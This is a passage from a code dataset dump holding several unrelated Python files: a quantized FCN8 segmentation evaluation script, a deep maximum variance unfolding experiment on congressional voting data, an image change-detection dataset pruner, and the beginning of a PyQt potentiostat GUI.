printed\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n# workaround for TF1.15 bug \"Could not create cudnn handle: CUDNN_STATUS_INTERNAL_ERROR\"\nos.environ['TF_FORCE_GPU_ALLOW_GROWTH'] = 'true'\n\nimport tensorflow.contrib.decent_q\n\nfrom tensorflow.python.platform import gfile\nfrom keras.preprocessing.image import img_to_array\n\nfrom config import fcn_config as cfg\nfrom config import fcn8_cnn as cnn\n\nDATAS_DIR = cfg.DATASET_DIR\nIMG_TEST_DIR = cfg.dir_test_img\nSEG_TEST_DIR = cfg.dir_test_seg\n\n#purely vectorial python coding style\ndef softmax_predict(logits):\n\tprediction = tf.nn.softmax(logits, name='prediction')\n\treturn prediction\n\n#C-like coding style\ndef cpp_softmax(inpTens, H, W, Nclass) :\n result = np.zeros((H,W, Nclass), dtype=\"float32\")\n iTens= inpTens\n for r in range(H): # loop on rows\n for c in range(W): # loop on columns\n sum = 0.0\n for d in range(Nclass): # loop on Classes\n result[r,c,d]=np.exp(iTens[r,c,d])\n sum = sum + result[r,c,d]\n for d in range(Nclass): # loop on Classes\n result[r,c,d]=result[r,c,d]/sum\n return result\n\n\ndef graph_eval(input_graph_def, input_node, output_node):\n #Reading images and segmentation labels\n x_test, y_test, img_file, seg_file= cnn.get_images_and_labels(IMG_TEST_DIR, SEG_TEST_DIR,\n cfg.NUM_CLASSES, cfg.WIDTH, cfg.HEIGHT)\n\n y_pred2 = np.zeros((y_test.shape))\n y_pred2i = np.zeros((y_test.shape[0],y_test.shape[1],y_test.shape[2]))\n\n # load graph\n tf.import_graph_def(input_graph_def,name = '')\n\n # Get input & output tensors\n x = tf.compat.v1.get_default_graph().get_tensor_by_name(input_node+':0')\n y = tf.compat.v1.get_default_graph().get_tensor_by_name(output_node+':0')\n\n # Create the Computational graph\n with tf.compat.v1.Session() as sess:\n sess.run(tf.compat.v1.initializers.global_variables())\n feed_dict={x: x_test}\n\t\t#y_pred = sess.run(y, feed_dict) # original code\n logits = sess.run(y, feed_dict) # new code\n pred_DB = softmax_predict(logits) #new code\n y_pred = pred_DB.eval() #new code\n ##alternative way to compute softmax in C++ style\n #for i in range(logits.shape[0]):\n # y_pred2[i]= cpp_softmax(logits[i], 224, 224, 12)\n\n\n # Calculate intersection over union for each segmentation class\n y_predi = np.argmax(y_pred, axis=3)\n y_testi = np.argmax(y_test, axis=3)\n print(y_testi.shape,y_predi.shape)\n cnn.IoU(y_testi,y_predi)\n\n ##just to check the cpp_softmax works fine\n #y_pred2i = np.argmax(y_pred2, axis=3)\n #print(y_testi.shape,y_pred2i.shape)\n #cfg.IoU(y_testi,y_pred2i)\n\n print ('FINISHED!')\n return x_test, y_testi, y_predi, y_pred2i, img_file, seg_file\n\n\ndef main(unused_argv):\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = FLAGS.gpu\n input_graph_def = tf.Graph().as_graph_def()\n input_graph_def.ParseFromString(tf.io.gfile.GFile(FLAGS.graph, \"rb\").read())\n\n x_test,y_testi,y_predi,y_pred2i, img_file,seg_file = graph_eval(input_graph_def, FLAGS.input_node, FLAGS.output_node)\n\n '''\n #save some segmented images\n for i in range(len(x_test)):\n k=i\n img_filename = img_file[k].split(\"/\")[-1]\n seg_filename = seg_file[k].split(\"/\")[-1]\n pred_filename= \"pred_\" + seg_filename.split(\"_\")[-1]\n print(img_filename, seg_filename, pred_filename)\n orig_image = (x_test[k]+1.0)*127.5\n gt_image = cnn.give_color_to_seg_img(y_testi[k], cfg.NUM_CLASSES)*255.0\n pred_image = cnn.give_color_to_seg_img(y_predi[k], cfg.NUM_CLASSES)*255.0\n orig_image = np.uint8(orig_image)\n gt_image = np.uint8(gt_image)\n B,G,R = cv2.split(gt_image)\n gt_image = cv2.merge((R,G,B))\n pred_image = np.uint8(pred_image)\n B,G,R = cv2.split(pred_image)\n pred_image = cv2.merge((R,G,B))\n cv2.imwrite(\"../rpt/quantized_\" + img_filename , orig_image)\n cv2.imwrite(\"../rpt/quantized_\" + seg_filename , gt_image )\n cv2.imwrite(\"../rpt/quantized\" + pred_filename , pred_image)\n '''\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--graph\", type=str,\n default=\"../quantized_results/quantize_eval_model.pb\",\n help=\"graph file (.pb) to be evaluated.\")\n parser.add_argument(\"--input_node\", type=str,\n default=\"input_1\",\n help=\"input node.\")\n parser.add_argument(\"--output_node\", type=str,\n default=\"conv2d_transpose_3/conv2d_transpose\",\n help=\"output node.\")\n parser.add_argument(\"--class_num\", type=int,\n default=cfg.NUM_CLASSES,\n help=\"number of classes.\")\n parser.add_argument(\"--gpu\", type=str,\n default=\"0\",\n help=\"gpu device id.\")\n FLAGS, unparsed = parser.parse_known_args()\n tf.compat.v1.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","repo_name":"Xilinx/Vitis-In-Depth-Tutorial","sub_path":"Machine_Learning/Design_Tutorials/05-Keras_FCN8_UNET_segmentation/files/code/eval_quantized_graph.py","file_name":"eval_quantized_graph.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"52"} +{"seq_id":"38882210946","text":"import torch\nimport torch.nn as nn\nimport pandas as pd\nfrom sklearn.neighbors import NearestNeighbors\nimport numpy as np\nimport time\nimport random\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.metrics import v_measure_score\nstart_time = time.time()\ntorch.manual_seed(2)\nrandom.seed(2)\n\n\n# Hyper parameters\nnum_original_dim = 16 # number of dimensions in the original data\nlbda_svd = .000001 # scaling for the singular value decomposition factor .00000000000001\nlbda_var = .0045 # scaling for the variance factor .0045\n\nnum_lm = 100 # number of landmarks, must be a multiple of ten\nbatch_size = 100 # number of points in each batch\nnum_batches = 2 # number of batches to use\ntest_size = 60 # number of points to use for testing\nsize = num_lm + (batch_size * num_batches) # total number of points needed\n\nlr = .1 # learning rate .0001\nlinear_dim1 = 10 # dimension of the first hidden layer\nlinear_dim2 = 32 # dimension of the second hidden layer\nlinear_dim3 = 32 # dimension of the third hidden layer\nlinear_dim4 = 10 # dimension of the fourth hidden layer\nlinear_dim5 = num_original_dim # dimension of the final layer\nepoch = 5 # number of times to train the network\nset_random = False # if true, choose landmarks randomly\ntemp_subset = num_lm + (batch_size * 5) # total number of points to acquire\nfinal_dim = 0 # number of dimensions to reduce to at the end\n\nk_start = 3 # how you find landmarks based off of number of nearest neighbors\nk_lm = 5 # number of landmarks each landmark has\nk_other = 10 # number of landmarks each regular points has\n\nm, n = size, 16 # number of samples, number of dimensions/parameters\n\n\ndef normalize(data):\n \"\"\"\n Function to normalize the data\n :param data: data to be normalized\n :return: normalized data\n \"\"\"\n row = np.size(data, 0) # number of data points\n col = np.size(data, 1) # dimensionality of data points\n for j in range(col):\n # find the average for each column\n col_sum = 0\n for i in range(row):\n col_sum = col_sum + data[i][j]\n col_sum = col_sum / row\n # subtract the average from each value in the column\n for i in range(row):\n data[i][j] = data[i][j] - col_sum\n return data\n\n\ndef original_clean():\n \"\"\"\n Method to clean the data\n :return: data and labels\n \"\"\"\n dataset = pd.read_csv('Parliment-1984.csv')\n X = dataset.iloc[:, 1:].values\n y = dataset.iloc[:, 0].values\n\n for i in range(0, 434):\n if y[i] == 'democrat':\n y[i] = 0\n elif y[i] == 'republican':\n y[i] = 1\n y = y.astype(int)\n\n for a in range(0, 434):\n for b in range(0, 16):\n if 'y' in X[a][b]:\n X[a][b] = 1\n elif 'n' in X[a][b]:\n X[a][b] = 0\n\n medians = []\n for x in range(0, 16):\n acceptable = []\n for z in range(0, 434):\n if (X[z][x] == 1) or (X[z][x] == 0):\n acceptable.append(X[z][x])\n med = np.median(acceptable)\n medians.append(int(med))\n\n for c in range(0, 434):\n for d in range(0, 16):\n if (X[c][d] != 1) and (X[c][d] != 0):\n X[c][d] = medians[d]\n X = X.astype(float)\n X = normalize(X)\n return X, y\n\n\nclass Net(nn.Module):\n \"\"\"\n Neural network to train\n \"\"\"\n def __init__(self):\n super(Net, self).__init__()\n self.f = nn.Linear(num_original_dim, linear_dim1, bias=True)\n self.f2 = nn.Linear(linear_dim1, linear_dim2, bias=True)\n self.f3 = nn.Linear(linear_dim2, linear_dim3, bias=True)\n self.f4 = nn.Linear(linear_dim3, linear_dim4, bias=True)\n self.f5 = nn.Linear(linear_dim4, linear_dim5, bias=True)\n\n def encode(self, x):\n p = nn.LeakyReLU()\n x = p(self.f(x))\n x = p(self.f2(x))\n x = p(self.f3(x))\n x = p(self.f4(x))\n x = self.f5(x)\n return x\n\n def decode(self, x):\n \"\"\"\n Holder function to be used to return to the original data (like an auto-encoder)\n To be implemented in future work\n :param x: data\n :return: decoded data\n \"\"\"\n return x\n\n def forward(self, x, decode):\n x = self.encode(x)\n if decode:\n x = self.decode(x)\n return x\n\n\ndef load_data():\n \"\"\"\n Function to load the data\n :param size: total number of points to get\n :param num_lm: number of points which will be landmarks\n :return: the batch loader, landmark points, labels, batched data without landmark points,\n data organized in graphs, neighborhood graph for the landmarks, original data, original labels,\n neighborhood graphs for non-landmarks\n \"\"\"\n global batch_size, num_batches\n # import data\n data, labels = original_clean()\n test_data = data[:test_size, :]\n test_labels = labels[:test_size]\n\n data = data[test_size:, :]\n\n # make landmarks with points with most neighbors\n N = NearestNeighbors(n_neighbors=k_start).fit(data).kneighbors_graph(data).todense()\n N = np.array(N)\n num_connections = N.sum(axis=0).argsort()[::-1] # see how many neighbors each point has\n top_landmarks_idxs = num_connections[:num_lm] # sort in descending order\n land_marks = data[top_landmarks_idxs, :] # pick the top ones\n data = np.delete(data, top_landmarks_idxs, axis=0) # delete the landmarks\n # find the nearest landmarks for the landmarks\n landmark_neighbors = NearestNeighbors(n_neighbors=k_lm).fit(land_marks).kneighbors_graph(land_marks).todense()\n # break data into batches, create empty holders\n batch_loader = np.zeros((num_batches, batch_size + num_lm, n))\n batch_graph = np.zeros((num_batches, batch_size + num_lm, batch_size + num_lm))\n # create the full neighborhood graph for each batch\n for i in range(num_batches):\n holder = data[batch_size * i: batch_size * (i + 1)]\n # find the nearest landmarks for the rest of the points\n holder_graph = NearestNeighbors(n_neighbors=k_other).fit(land_marks).kneighbors_graph(holder).todense()\n for j in range(batch_size): # copy over the holder graph\n for l in range(num_lm):\n if holder_graph[j, l] == 1:\n batch_graph[i, j, l + batch_size] = 1\n batch_graph[i, l + batch_size, j] = 1\n for j in range(num_lm): # copy over landmark neighbors\n for l in range(j, num_lm):\n if landmark_neighbors[j, l] == 1 and j != l:\n batch_graph[i, j + batch_size, l + batch_size] = 1\n batch_graph[i, l + batch_size, j + batch_size] = 1\n holder = np.concatenate((holder, land_marks))\n batch_loader[i] = holder\n batch_size += num_lm # adjust the batch size\n return batch_loader, data, batch_graph, landmark_neighbors, test_data, test_labels, land_marks\n\n\ndef train_net(epoch, data, net, opti, batch_graph):\n \"\"\"\n Function to train the network\n :param epoch: number of times to train\n :param data: data to train with\n :param net: neural network to train\n :param opti: optimizer to use during training\n :return:\n \"\"\"\n global num_batches, batch_size\n # train the network\n for num in range(epoch):\n # run each batch through each round\n for batch_id in range(num_batches):\n # calculate the neighborhood for the graph\n batch = torch.from_numpy(data[batch_id]).float()\n batch = batch.view(batch_size, -1)\n batch_distances = pairwise_distances(batch)\n nbr_graph_tensor = torch.from_numpy(batch_graph[batch_id]).float()\n batch_distances_masked = batch_distances * nbr_graph_tensor.float()\n global lbda\n out = net(batch, False) # run the batch through the network\n svd_loss, out = implement_svd(out) # calculate the SVD L2,1 loss and SVD representation\n output_distances = pairwise_distances(out)\n # Multiply the distances between each pair of points with the neighbor mask\n output_distances_masked = output_distances * nbr_graph_tensor.float()\n # Find the difference between |img_i - img_j|^2 and |output_i - output_j|^2\n nbr_diff = torch.abs((output_distances_masked - batch_distances_masked))\n nbr_distance = nbr_diff.norm()\n svd_loss *= lbda_svd # multiply SVD loss by its scaling factor\n # find variance in all directions\n var = 0\n for i in range(out.size()[0]):\n var += lbda_var / out[i].var()\n loss = nbr_distance + svd_loss + var # loss contains all three terms\n opti.zero_grad()\n loss.backward()\n opti.step()\n print('Epoch: %f, Step: %f, Loss: %.2f' % (num, batch_id + 1, loss.data.cpu().numpy()))\n\n # find the ideal number of dimensions\n global final_dim\n batch = torch.from_numpy(data[0]).float()\n batch = batch.view(batch_size, -1)\n out = net(batch, False)\n u, s, v = torch.svd(out)\n final_dim = calc_dim(s)\n\n\ndef train_lms(epoch, land_marks, net, opti, landmark_neighbors):\n \"\"\"\n Function to train the landmarks to spread them out\n :param epoch: number of times to train the network\n :param land_marks: points to use for distance calculations\n :param net: neural network to train\n :param opti: optimizer to use for the network\n :param landmark_neighbors: nearest neighbors of the landmarks\n :return:\n \"\"\"\n # find the neighborhood graphs for the landmarks\n batch = torch.from_numpy(land_marks).float().view(num_lm, -1)\n batch_distances = pairwise_distances(batch)\n neighbor_graph = torch.from_numpy(landmark_neighbors).float()\n batch_distances_masked = batch_distances * neighbor_graph.float()\n # train the network\n for num in range(epoch):\n global lbda\n print(batch.shape)\n out = net(batch, False) # put the data through the network\n svd_loss, out = implement_svd(out) # find SVD translation and L2,1 regularization\n output_distances = pairwise_distances(out)\n # Multiply the distances between each pair of points with the neighbor mask\n output_distances_masked = output_distances * neighbor_graph.float()\n # Find the difference between |img_i - img_j|^2 and |output_i - output_j|^2\n nbr_diff = torch.abs((output_distances_masked - batch_distances_masked))\n nbr_distance = nbr_diff.norm()\n svd_loss *= lbda_svd # multiply SVD term by its scaling factor\n # calculate variance in all direction\n var = 0\n for i in range(out.size()[0]):\n var += lbda_var / out[i].var()\n loss = nbr_distance + svd_loss + var # loss includes all three terms\n opti.zero_grad()\n loss.backward()\n opti.step()\n print('Epoch [{}/{}], Loss: {:.4f}'.format(num + 1, epoch, loss.item()))\n\n\ndef pairwise_distances(x):\n '''\n TODO cite this\n Input: x is a Nxd matrix\n y is an optional Mxd matirx\n Output: dist is a NxM matrix where dist[i,j] is the square norm between x[i,:] and y[j,:]\n if y is not given then use 'y=x'.\n i.e. dist[i,j] = ||x[i,:]-y[j,:]||^2\n '''\n x_norm = (x ** 2).sum(1).view(-1, 1) # square every element, sum, resize to list\n y = torch.transpose(x, 0, 1)\n y_norm = x_norm.view(1, -1)\n\n dist = x_norm + y_norm - 2.0 * torch.mm(x, y)\n return torch.clamp(dist, 0.0, np.inf)\n\n\ndef implement_svd(data):\n \"\"\"\n Function to implement svd on the data and find the L2,1 regularization term\n :param data: data to be reduced with SVD\n :return: L2,1 regularization term and transformed matrix\n \"\"\"\n u, s, v = torch.svd(data) # implement svd\n # note: the u returned by this function only includes the top values.\n # u * s will be equivalent due to the zero terms, but will run more efficiently with this implementation.\n s = torch.diag(s) # turn s into a diagonal matrix\n transformed_matrix = torch.mm(u, s) # u * s\n return l21_reg(s), transformed_matrix # return the L2,1 regularization term and matrix\n\n\ndef l21_reg(data):\n \"\"\"\n Function to find the L2,1 regularization term\n :param data: matrix to find the L2,1 regularization term of\n :return: L2,1 regularization term\n \"\"\"\n m = data.size()[0] # number of data points\n n = data.size()[1] # number of dimensions on the data points\n # find L2,1 regularization term\n outer_sum = 0\n for i in range(m):\n inner_sum = 0\n for j in range(n):\n inner_sum += data[i][j] ** 2\n outer_sum += inner_sum ** 0.5\n return outer_sum\n\n\ndef evaluate(test_dataset, test_labels, net):\n \"\"\"\n Function to evaluate the accuracy of the model\n :param test_dataset: test data\n :param test_labels: lables for the test data\n :param net: pre-trained data\n :return: accuracy score\n \"\"\"\n rep = torch.zeros((test_dataset.shape[0], final_dim))\n # find each lower dimensional representation\n d = torch.from_numpy(test_dataset)\n net = net.double()\n out = net(d, False) # put through the network\n u, s, v = torch.svd(out) # implement SVD\n top_vals = torch.diag(s) # create the diagonal matrix from s\n top_vals = top_vals[:, :final_dim] # cut down s with SVD\n rep = torch.mm(u, top_vals)\n # evaluate the accuracy of the representation\n rep = rep.detach().numpy()\n model = DBSCAN()\n predicted = model.fit_predict(rep)\n score = v_measure_score(predicted, test_labels)\n return rep, score\n\n\ndef calc_dim(s):\n \"\"\"\n Function to calculate the number of dimensions which would equal 90% of the data information\n :param s: S vector from SVD\n :return: suggested number of dimensions to use\n \"\"\"\n s = s.detach().numpy()\n dim = 0\n # calculate how much 90% would be\n s_square = [i ** 2 for i in s]\n sum_square = sum(s_square)\n goal = .9 * sum_square\n # find 90%\n count = 0\n while count < goal:\n count += s_square[dim]\n dim += 1\n return dim # return this many dimensions\n\n\ndef run():\n global num_lm\n # load the data\n data_loader, data, batch_graph, landmark_neighbors, test_dataset, test_labels, land_marks = load_data()\n # create the network and initialize the weights\n net = Net()\n opti = torch.optim.Adam(net.parameters(), lr=lr, weight_decay=1e-3)\n train_lms(epoch, land_marks, net, opti, landmark_neighbors) # train the landmarks only first\n train_net(epoch, data_loader, net, opti, batch_graph) # train all other points to fit around the landmarks\n # load test data\n return evaluate(test_dataset, test_labels, net) # evaluate model accuracy\n\n\nrep, score = run()\nprint(score)\n","repo_name":"jabader97/DeepMaximumVarianceUnfolding","sub_path":"SVDMVU/SVDMVU_CongressionalVotingRecords.py","file_name":"SVDMVU_CongressionalVotingRecords.py","file_ext":"py","file_size_in_byte":14746,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"34761776550","text":"import glob\nimport os\nimport argparse\n\n\nimport cv2\nimport imutils\n\nparser = argparse.ArgumentParser(description='Dataset optimisation')\nparser.add_argument('--path', help='path to dataset')\nparser.add_argument('--min_len_cont',default=0, help='minimum length of contours that is checked for very similar images')\nparser.add_argument('--min_prob',default=0, help='minimum probability that is checked for very similar images')\nparser.add_argument('--minor_cont',default=10, help='no of contours checked for very minor changes')\nparser.add_argument('--minor_prob',default=0.02, help='minumum probability that is checked for very minor changes')\nparser.add_argument('--person_cont',default=2, help='no of contours checked for the presence of human or similar')\nparser.add_argument('--person_prob',default=1, help='minumum probability that is checked for presence of human or similar')\nparser.add_argument('--infront_cont',default=3, help='no of contours checked if something comes infront of the camera')\nparser.add_argument('--infront_prob',default=30, help='minumum probability that is checked if something comes infront of the camera')\nparser.add_argument('--car_cont',default=10, help='no of contours checked if a car comes in or leaves')\nparser.add_argument('--car_prob',default=10, help='minumum probability that is checked if a car comes in or leaves')\nparser.add_argument('--climatic_cont',default=15, help='no of contours checked due to changes in climatic conditions')\nparser.add_argument('--climatic_prob',default=25, help='minumum probability that is checked due to changes in climatic conditions')\n\n\ndef draw_color_mask(img, borders, color=(0, 0, 0)):\n h = img.shape[0]\n w = img.shape[1]\n\n x_min = int(borders[0] * w / 100)\n x_max = w - int(borders[2] * w / 100)\n y_min = int(borders[1] * h / 100)\n y_max = h - int(borders[3] * h / 100)\n\n img = cv2.rectangle(img, (0, 0), (x_min, h), color, -1)\n img = cv2.rectangle(img, (0, 0), (w, y_min), color, -1)\n img = cv2.rectangle(img, (x_max, 0), (w, h), color, -1)\n img = cv2.rectangle(img, (0, y_max), (w, h), color, -1)\n\n return img\n\n\ndef preprocess_image_change_detection(img, gaussian_blur_radius_list=None, black_mask=(5, 10, 5, 0)):\n gray = img.copy()\n gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY)\n if gaussian_blur_radius_list is not None:\n for radius in gaussian_blur_radius_list:\n gray = cv2.GaussianBlur(gray, (radius, radius), 0)\n\n gray = draw_color_mask(gray, black_mask)\n\n return gray\n\n\ndef compare_frames_change_detection(prev_frame, next_frame, min_contour_area):\n frame_delta = cv2.absdiff(prev_frame, next_frame)\n thresh = cv2.threshold(frame_delta, 45, 255, cv2.THRESH_BINARY)[1]\n\n thresh = cv2.dilate(thresh, None, iterations=2)\n cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n\n score = 0\n res_cnts = []\n for c in cnts:\n if cv2.contourArea(c) < min_contour_area:\n continue\n\n res_cnts.append(c)\n score += cv2.contourArea(c)\n\n return score, res_cnts, thresh\n\n\ndef main():\n args = parser.parse_args()\n\n if args.path is None:\n print('Enter path to directory')\n exit()\n\n image_names = {}\n for index, name in enumerate(sorted(glob.glob(args.path + '/*'))):\n image_names[index] = {'image_name': name, 'compare_status': None}\n\n no_changes = 0\n climatic_changes = 0\n minor_sunlight_changes = 0\n car_changes = 0\n infront_camera = 0\n people_changes = 0\n\n for key, values in image_names.items():\n print(f'Looping over images {key}')\n next_frame_index = key + 1\n if next_frame_index in image_names.keys():\n try:\n next_frame_img = image_names[next_frame_index]['image_name']\n except:\n pass\n\n image_1 = cv2.imread(values['image_name'])\n height, width = image_1.shape[0], image_1.shape[1]\n area_image = height * width\n preprocess_1 = preprocess_image_change_detection(image_1, gaussian_blur_radius_list=[3, 5])\n\n image_2 = cv2.imread(next_frame_img)\n preprocess_2 = preprocess_image_change_detection(image_2, gaussian_blur_radius_list=[3, 5])\n\n score, res_cnts, thresh = compare_frames_change_detection(preprocess_1, preprocess_2, min_contour_area=450)\n\n thresh = cv2.dilate(thresh, None, iterations=2)\n cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n\n len_cnts = len(cnts)\n len_res_cnts = len(res_cnts)\n probability_change = score / area_image\n\n if len_res_cnts == args.min_len_cont or probability_change == args.min_prob:\n # This conditions checks whether there are no observable changes between two frames\n values['compare_status'] = True\n no_changes += 1\n\n elif len_cnts >= args.minor_cont and probability_change >= args.minor_prob:\n # This condition checks whether there are some minor changes mostly some changes in daylight\n values['compare_status'] = True\n minor_sunlight_changes += 1\n\n elif len_res_cnts < args.person_cont and probability_change < args.person_prob:\n # This condition checks whether there are any changes due to presence of humans or anthhing similar\n values['compare_status'] = False\n people_changes += 1\n\n elif len_res_cnts <= args.infront_cont and probability_change <= args.infront_prob:\n # This condition checks for presence of something right infront of the camera\n values['compare_status'] = False\n infront_camera += 1\n\n elif len_res_cnts < args.car_cont and probability_change <= args.car_prob:\n # This condition checks if there are changes due to presence or absence of cars from the scene\n values['compare_status'] = False\n car_changes += 1\n\n elif len_res_cnts >= args.climatic_cont or probability_change >= args.climatic_prob:\n # This condtion checks for changes that occur because of major climatic changes\n values['compare_status'] = True\n climatic_changes += 1\n else:\n # This condition caters all other changes and doesnot change the status to True for not to miss out crucial information\n values['compare_status'] = False\n\n\n if values['compare_status'] == True:\n os.remove(values['image_name'])\n\n count = 0\n for keys, values in image_names.items():\n if values['compare_status'] == True:\n count += 1\n\n\n print(f'Discarded images because of no observable changes {no_changes}')\n print(f'Discarded images because of climatic changes {climatic_changes}')\n print(f'Discarded images because of minor sunlight changes {minor_sunlight_changes}')\n print(f'Changes dye to vehicle movements {car_changes}')\n print(f'Changes due to movemnts infront of the camera {infront_camera}')\n print(f'Changes due to movemnts of person {people_changes}')\n print(f'Deleted images = {count}')\n print(f'Percentage of deleted images = {count / len(image_names) * 100}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hamza9305/Kopernikus_task","sub_path":"imaging_interview.py","file_name":"imaging_interview.py","file_ext":"py","file_size_in_byte":7329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43711199324","text":"#!/usr/bin/env python\r\n\r\n\r\n#############################################################################\r\n##\r\n## Copyright (C) 2013 Riverbank Computing Limited.\r\n## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).\r\n## All rights reserved.\r\n##\r\n## This file is part of the examples of PyQt.\r\n##\r\n## $QT_BEGIN_LICENSE:BSD$\r\n## You may use this file under the terms of the BSD license as follows:\r\n##\r\n## \"Redistribution and use in source and binary forms, with or without\r\n## modification, are permitted provided that the following conditions are\r\n## met:\r\n## * Redistributions of source code must retain the above copyright\r\n## notice, this list of conditions and the following disclaimer.\r\n## * Redistributions in binary form must reproduce the above copyright\r\n## notice, this list of conditions and the following disclaimer in\r\n## the documentation and/or other materials provided with the\r\n## distribution.\r\n## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor\r\n## the names of its contributors may be used to endorse or promote\r\n## products derived from this software without specific prior written\r\n## permission.\r\n##\r\n## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\r\n## \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\r\n## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\r\n## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\r\n## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\r\n## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\r\n## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\r\n## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\r\n## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\r\n## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\r\n## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\"\r\n## $QT_END_LICENSE$\r\n##\r\n#############################################################################\r\n\r\n\r\nfrom PyQt5.QtCore import QDateTime, Qt, QTimer\r\nfrom PyQt5.QtWidgets import (QApplication, QCheckBox, QComboBox, QDateTimeEdit,\r\n QDial, QDialog, QGridLayout, QGroupBox, QHBoxLayout, QLabel, QLineEdit,\r\n QProgressBar, QPushButton, QRadioButton, QScrollBar, QSizePolicy,\r\n QSlider, QSpinBox, QStyleFactory, QTableWidget, QTabWidget, QTextEdit,\r\n QVBoxLayout, QWidget)\r\nfrom pyqtgraph import PlotWidget, plot\r\nimport pyqtgraph as pg\r\nimport serial\r\n\r\n\r\nclass WidgetGallery(QDialog):\r\n def __init__(self, parent=None):\r\n super(WidgetGallery, self).__init__(parent)\r\n\r\n self.originalPalette = QApplication.palette() \r\n\r\n self.useStylePaletteCheckBox = QCheckBox(\"&Use style's standard palette\")\r\n self.useStylePaletteCheckBox.setChecked(True)\r\n\r\n disableWidgetsCheckBox = QCheckBox(\"&Disable widgets\")\r\n\r\n self.createTopLeftGroupBox()\r\n self.createTopRightGroupBox()\r\n self.createProgressBar()\r\n\r\n self.useStylePaletteCheckBox.toggled.connect(self.changePalette)\r\n disableWidgetsCheckBox.toggled.connect(self.topLeftGroupBox.setDisabled)\r\n disableWidgetsCheckBox.toggled.connect(self.topRightGroupBox.setDisabled)\r\n\r\n topLayout = QHBoxLayout()\r\n topLayout.addStretch(1)\r\n\r\n mainLayout = QGridLayout()\r\n mainLayout.addLayout(topLayout, 0, 0, 1, 2)\r\n mainLayout.addWidget(self.topLeftGroupBox, 1, 0)\r\n mainLayout.addWidget(self.topRightGroupBox, 1, 1)\r\n mainLayout.addWidget(self.progressBar, 2, 0, 1, 2)\r\n mainLayout.setRowStretch(1, 1)\r\n mainLayout.setRowStretch(2, 4)\r\n mainLayout.setColumnStretch(0, 1)\r\n mainLayout.setColumnStretch(1, 5)\r\n self.setLayout(mainLayout)\r\n\r\n self.setWindowTitle(\"Potentiostat Application\")\r\n self.changeStyle('Fusion')\r\n\r\n def changeStyle(self, styleName):\r\n QApplication.setStyle(QStyleFactory.create(styleName))\r\n self.changePalette()\r\n\r\n def changePalette(self):\r\n if (self.useStylePaletteCheckBox.isChecked()):\r\n QApplication.setPalette(QApplication.style().standardPalette())\r\n else:\r\n QApplication.setPalette(self.originalPalette)\r\n\r\n def advanceProgressBar(self):\r\n curVal = self.progressBar.value()\r\n maxVal = self.progressBar.maximum()\r\n self.progressBar.setValue(curVal + (maxVal - curVal) // 100)\r\n\r\n def createTopLeftGroupBox(self):\r\n self.topLeftGroupBox = QGroupBox(\"Insert Measurement Parameters:\")\r\n\r\n # Select Measurement Method\r\n self.styleComboBox = QComboBox()\r\n methods = [\"CV\", \"DPV\", \"EIS\"]\r\n self.styleComboBox.addItems(methods)\r\n self.styleComboBox.setCurrentText(\"CV\")\r\n\r\n self.styleLabel = QLabel(\"&Select measurement method:\")\r\n self.styleLabel.setBuddy(self.styleComboBox)\r\n\r\n # Simpan metode pengukuran yang terpilih\r\n chosenMethod = self.styleComboBox.currentText()\r\n\r\n # Labels\r\n self.NbCycleLabel = QLabel(self)\r\n self.NbCycleLabel.setText(\"Number of cycles\")\r\n self.VminLabel = QLabel(self)\r\n self.VminLabel.setText(\"Vmin (V)\")\r\n self.VmaxLabel = QLabel(self)\r\n self.VmaxLabel.setText(\"Vmax (V)\")\r\n self.SRLabel = QLabel(self)\r\n self.SRLabel.setText(\"Scan rate (V/s)\")\r\n self.FminLabel = QLabel(self)\r\n self.FminLabel.setText(\"Min freq (Hz)\")\r\n self.FmaxLabel = QLabel(self)\r\n self.FmaxLabel.setText(\"Max freq (Hz)\")\r\n self.PWLabel = QLabel(self)\r\n self.PWLabel.setText(\"Pulse width (ms)\")\r\n self.CurrRangeLabel = QLabel(self)\r\n self.CurrRangeLabel.setText(\"Curr range (uA)\")\r\n\r\n # Text Fields\r\n self.NbCycle = QLineEdit(self)\r\n self.Vmin = QLineEdit(self)\r\n self.Vmax = QLineEdit(self)\r\n self.ScanRate = QLineEdit(self)\r\n self.Fmin = QLineEdit(self)\r\n self.Fmax = QLineEdit(self)\r\n self.PW = QLineEdit(self)\r\n self.CurrRange = QLineEdit(self)\r\n\r\n # Inisialisasi komunikasi serial\r\n esp_serial = serial.Serial('COM3', 115200, bytesize=serial.EIGHTBITS, 